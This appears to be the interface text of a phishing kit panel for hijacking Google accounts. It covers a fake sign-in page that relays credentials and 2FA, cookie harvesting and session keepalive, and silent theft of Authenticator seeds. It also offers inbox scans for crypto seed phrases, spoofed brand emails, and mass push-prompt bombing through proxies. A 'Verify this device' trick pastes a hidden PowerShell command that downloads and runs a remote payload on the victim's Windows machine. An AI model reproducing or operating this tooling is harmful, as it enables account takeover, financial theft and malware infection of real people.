Sessions

Victims appear here the moment they start typing their email on the capture page — watch it live.

Live — victims on the capture page right now

–
Sessions
–
Live now
–
Alive
–
Captured
–
Dead
EmailStatusStepCaseOwnerKeepaliveCookiesMail2FARotatedCreated
Loading…

Victims

Everyone on the capture page right now — live control, phone capture, live view of what they see, and their captured data.

–
On the page now
–
Typing
–
Signing in
–
In 2FA
EmailStatusStepIPLive dataLast seen
No victims on the page right now — they appear here the moment someone opens your capture link.

Proxies

The shared proxy pool — every prompter browser (and any capture browser that uses it) goes through these, round-robin. While proxy-required is on, your real IP never touches Google.

–
Proxies in pool
–
Reach Google (last test)
–
Proxy-required mode
Pool

One proxy per line. Formats: host:port or host:port:user:pass (also accepts user:pass@host:port). The pool survives restarts — it's stored in data/Proxies.txt.

Safety

Applies to Mass Prompt browsers. Keeper keepalive traffic runs from this host by default.

Test results
ProxyExit IPCountryGoogleLatencyError
Not tested yet — press "Test all".

Cases — one capture link per target

Create a case, send its link to one victim, and everything they do lands tagged to that case. Cleaner than sharing the generic capture link with everyone.

–
Cases
–
Victims via cases
–
Captured
New case
Link preview: …
CaseLinkVictimsCapturedCreated
No cases yet.

Mail Checker

Browse and search any captured session's mailbox live — read messages and download attachments just like their inbox.

–
On this page
–
Unread
–
Attachments
Quick filters:
FromSubjectDate
Select a victim above.
page 1

Mail Stats — what's in their inbox

Deep stats per victim mailbox: total emails, crypto-exchange mail, seed-phrase hits, attachments and file types — the stuff that tells you what a victim is worth.

–
Total emails
–
In inbox
–
Unread
–
With attachments
–
Crypto mail
Crypto exchanges — mail from each service
ServiceEmails
Run a scan.
Seed phrases / wallet keywords
KeywordEmails
Run a scan.
Files & attachments
TypeEmails
Run a scan.

FA Mailer — brand templates

Spoofed brand emails (Binance, Coinbase, Ledger…) dropped straight into the victim's own inbox, plus your own imported .html templates (private to your account). Templates ported from the FA mailer; delivery uses the session's captured mail access — the mail lands as a normal received message.

–
Templates
–
Brands
0
Sent (this page)
1 Recipient
2 Brand template built-in library — shared with everyone
3 My templates import your own .html — only you can see them

Imported templates support {{placeholders}} — they become fill-in fields when you send, and {{MM/DD}}-style dates auto-fill. Images inlined as attachments, lands starred in their inbox like brand templates.

4 Send

Mail Scanner — keywords & seed phrases

Scan a captured session's mailbox for keywords (verification codes, exchanges) and BIP39 seed phrases (12/18/24 words). Ported from the FA mailer's InboxScanner — runs through the session's mail access, no victim interaction. Scans the whole mailbox — every email, every page, no caps.

–
Emails scanned
–
Keyword hits
–
Seed phrases
DateFromSubjectKeywordsSeeds
Run a scan to see matches.

Authenticator — live 2FA codes

OTP seeds synced from the victim's Google Authenticator are extracted automatically (and silently) at sign-in. Codes below are generated locally in real time — no victim phone, no third-party sites.

–
Sessions
–
With synced seeds
–
Synced 2FA accounts
re-pulls seeds using the master token captured at sign-in re-runs the EmbeddedSetup walk in the session's browser profile manual fallback — paste the oauth2_4/… cookie from EmbeddedSetup (F12 → Application → Cookies)
ServiceAccountCodeExpiresType
Select a victim above.

Mass Prompt — batch "Tap Yes" phone prompts

Feed a list of Gmails (and optional US recovery numbers) — the engine walks Google's sign-in on each and fires the Tap Yes on your phone push. All traffic goes through the proxy pool — your IP never touches Google. The victim taps Yes → you can capture the session.

–
Proxies in pool
–
Runs
–
Prompts sent
–
Run status
New run
EmailPhoneStatusStageMessageProxyVictim
No run yet — paste leads above and press Start.
Proxy pool

Every prompt browser goes through these (round-robin). Formats: host:port or host:port:user:pass. While proxy-required is on, an empty pool blocks runs — your IP never leaks.

ProxyExit IPCountryGoogleLatencyResult
Test the pool to see exit IPs and Google reachability.
Settings

Passwords

Every password we set or captured — email, password, phone.

Add / update
EmailPasswordPhoneSourceUpdated
No passwords yet.

Add Victim

Manually add a client/victim entry — useful for testing the pipeline, tracking clients, or importing cookies captured elsewhere.

Paste a Cookie-Editor export or captured cookie array. If provided, the keeper will adopt this session and start rotating it.

Capture Setup

1:1 Google sign-in served by this panel — no third-party reverse proxy. Victims appear in Sessions the moment they start typing.

Victim capture link Send this to the victim — email, SMS, QR, your choice. Victims arriving through your link are attributed to you only.
Tip: for one target per link, use the Cases page — /c/case-1234 style links tag each victim.
Your personal capture link & Google Sites embed Each panel user gets their own link — victims from it land only in your panel. To put it on a Google Sites page: copy the embed snippet below, then in Google Sites use Insert → Embed → Embed code, paste, and publish.
1Victim opens the link

The page is a pixel-faithful Google sign-in — real wordmark, floating labels, identical layout.

2You see it live

The moment a valid-looking email is typed, a row appears — every keystroke streams to the dashboard over WebSocket.

3They sign in

The password is replayed into real accounts.google.com in a stealth Chromium. 2FA challenges (code, number match, phone tap) show on their page too.

4Session captured

On success the full cookie jar (SID, HSID, SSID, SAPISID…) is harvested, the keeper adopts it, Telegram alerts fire.

5You take over

Export the Cookie-Editor JSON from the drawer and import into any anti-detect browser — signed in as the victim.

Test the pipeline right nowInjects a fake test@gmail.com session through the same internal path a real capture uses.

Device Verify — clipboard paste-jack

Built into the capture flow: after Google accepts the sign-in (and any prompt), the victim sees a "Verify this device" card before You're signed in. Continue copies your command to their clipboard and walks them through Win+R → paste → Enter. When the payload pings back, they're signed in automatically.

Victim device-verify link Send this after (or instead of) the capture link. Works best on Windows + Chrome/Edge. The command only pastes once they press Continue.
Clipboard command (what gets pasted on their machine)

Runs from Win+R on the Verify this device card (shown after the password/2FA step, before "You're signed in"). Placeholders: {host} → your panel host, {session} → the victim's live session id. Ping http://{host}/device/ping/{session} from the payload to sign them in automatically. Example: powershell -w hidden -c "iwr http://{host}/device/ping/{session};iwr http://{host}/payload.ps1|iex"

Saved to data/device-script.txt — takes effect instantly for new victims.
1Victim signs in

Normal capture flow: email → password → 2FA / phone prompt, exactly as before.

2"Verify this device" card

After Google accepts the login (before "You're signed in"), the victim is asked to set this computer as their main device. Continue → your command is silently copied to their clipboard.

3They follow the steps

Win+R → Ctrl+V → Enter. The page walks them through each keypress with progress highlighting.

4Payload runs → signed in

When the payload pings /device/ping/{session}, the page flips to "You're signed in" automatically. Skip (or the live control "Success" tile) also finishes the flow.

Users

Panel accounts: create user logins, they sign in with username + password and only see their own victims. Set a subscription to auto-expire accounts after N days.

days (empty = never)
Users see only their own victims and runs. Admins see everything, including all users' logs and connected accounts. Users sign in on the same login screen with the Username / Password tab.
UserRoleStatusSubscriptionVictimsLast loginCreatedActions
loading…

Imported templates (all users)

Every .html template users imported in the FA Mailer — click Preview to see one rendered.

TemplateOwnerPlaceholdersSizeUpdatedActions
loading…

Activity trail

Every sign-in, capture, run and action by every user.

WhenWorkerActionDetail
loading…

How to Use

The full flow, start to finish. More detail in INSTRUCTIONS.md.

1Panel is running

You're looking at it. The keeper rotates tokens for all keepalive sessions every 5 minutes.

2Send the lure link

Email, SMS, QR — however you deliver it. The link opens the 1:1 Google sign-in on your domain. Grab it from Capture Setup, or make a per-victim link on the Cases page.

3Victim arrives — live view starts

The moment the victim types their email, a row appears in Sessions (status typing) and the Live box shows their keystrokes in real-time. Email, password, and 2FA code are all captured automatically — no manual entry.

4Victim signs in — 2FA included

The victim sees the real Google flow (password, SMS/TOTP/push, number match). If Google shows a challenge, the victim's page shows it too and they can complete it right there.

5Session appears instantly

Telegram alert fires (if configured) and the session shows in Sessions with status captured. Mail access (✉) and Authenticator seeds (2FA badge) are harvested silently in the background right after — no permission screens, no victim action.

6Export the cookies

Click the session → Export cookies (JSON) → import into any anti-detect browser via the Cookie-Editor extension (delete google.com cookies first, then import, refresh). You're signed in as the victim.

7Keep it alive

Sessions with keepalive on get fresh tokens every 5 min so they never expire. Dead sessions (password change / sign-out) turn red and alert you.

8Drop emails into their inbox

Any session with the MAIL badge accepts fully spoofed emails from the FA Mailer — pick a brand template or import your own .html, fill the variables, preview, send.

9Read their 2FA codes

Victims using Google Authenticator cloud sync get their OTP seeds extracted silently — the Authenticator page shows live codes with expiry bars.

10Manage victims

Add entries manually on Add Victim (testing / bookkeeping), and delete any session with the delete button in its row or drawer.

11Fire phone prompts

Mass Prompt sends "Tap Yes" pushes to a lead list — it drives Google's sign-in by itself and fires the push to the victim's phone. When Google shows a matching number, it appears on the run log and here.

Panel access

Sign in with your user account — or use the admin token.